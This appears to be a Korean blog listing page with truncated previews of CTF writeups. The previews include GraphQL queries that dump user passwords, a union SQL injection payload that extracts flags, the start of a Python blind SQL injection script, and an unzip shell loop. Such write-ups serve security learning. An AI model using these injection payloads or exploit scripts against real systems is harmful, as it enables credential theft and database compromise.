보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
1. graphql injection 2. union sql injection get admin password { allUsers{ username password } } login - admin:is_this_visible_to_you? { Challs{ id title description category author points flag{ chall_flag } } } Get Flag using sql injection { hint(chall_id:"-1/**/union/**/select/**/substr(group_concat(chall_flag),256,512),2,3/**/from/**/flags#"){ chall_id } }
1. SQL injection 2. file upload -> rcesql_exploit.py import requests import string import time url = 'http://vkl-sql.darkarmy.xyz/login.php' table_name = '' strings = 'abcdefghijklmnopqrstuvwxyzABCDEFGHJIJKLMNOPQRSTUVWXYZ1234567890{}' for i in range(1,80): for j in strings: #data = {'username':'admin" and if(ascii(substr((select schema_name from information_sc..
LAYER7 CTF Writeup - as3617 mic check - MISC (100pts) 개발자도구로 description 영역을 확인해보면 플래그가 있다. FLAG : LAYER7{SunriNIN73rN3thIGHScHOO1layEr7} zipzipzipzipzip - MISC (100pts) 압축파일을 열어보면 안에 또 압축파일이 있는데 손으로 하기 귀찮아서 shell script로 빠르게 풀었다. while [ "`find . -type f -name '*.zip' | wc -l`" -gt 0 ] do find . -type f -name "*.zip" -exec unzip -- '{}' \; -exec rm -- '{}' \; done 압축파일이 있는 폴더로 가서 위의 스크립트를 실행하면 ..